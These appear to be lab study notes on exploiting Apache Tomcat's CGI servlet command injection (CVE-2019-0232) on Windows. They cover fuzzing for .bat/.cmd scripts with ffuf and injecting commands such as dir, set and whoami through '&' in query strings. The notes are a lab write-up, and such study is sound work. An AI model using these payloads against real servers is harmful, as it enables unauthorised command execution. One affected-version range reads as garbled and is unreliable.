Skip to content

Attacking Tomcat CGI

  • https://github.com/setrus/CVE-2019-0232
    • affects Windows systems that have the enableCmdLineArguments feature enabled.
    • exploit this vulnerability by exploiting a command injection flaw resulting from a Tomcat CGI Servlet input validation error, thus allowing them to execute arbitrary commands on the affected system.
    • Versions 9.0.0.M1 to 9.0.178.5.0 to 8.5.39, and 7.0.0 to 7.0.93 of Tomcat are affected
  • The CGI Servlet is a vital component of Apache Tomcat that enables web servers to communicate with external applications beyond the Tomcat JVM.
    • These external applications are typically CGI scripts written in languages like Perl, Python, or Bash.
    • The CGI Servlet receives requests from web browsers and forwards them to CGI scripts for processing.
    • Webserver (Apache tomcat) -> CGI Servlet -> CGI Script (processing) -> response

Issue:

  • The enableCmdLineArguments setting if set to true - the CGI Servlet parses the query string and passes it to the CGI script as arguments.
    • This feature can make CGI scripts more flexible and easier to write by allowing parameters to be passed to the script without using environment variables or standard input.
    • a CGI script can use command line arguments to switch between actions based on user input.
  • EX: Suppose you have a CGI script that allows users to search for books in a bookstore's catalogue. The script has two possible actions: "search by title" and "search by author."
  • http://example.com/cgi-bin/booksearch.cgi?action=title&query=the+great+gatsby
  • http://example.com/cgi-bin/booksearch.cgi?action=author&query=fitzgerald
  • using the command line args in the CGI script allows easy switch in the actions

Enum

  • run nmap to find the apache server
  • find a cgi script using ffuf
  • since we are aiming to pwn Windows
  • for CMD
    • ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd
  • for BAT
    • ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat
  • navigate to cgi script found to check it.

Attack:

  • exploit CVE-2019-0232 - https://github.com/setrus/CVE-2019-0232
  • it allows appending our own commands using the batch command separator &
  • http://10.129.204.227:8080/cgi/welcome.bat?&dir
  • http://10.129.204.227:8080/cgi/welcome.bat?&set
    • allows you to see env variables
    • we can see C:\Windows\system32\cmd.exe is set so other binaries like whoami.exe should be here
  • http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
    • url-encoded payload.
    • space should be +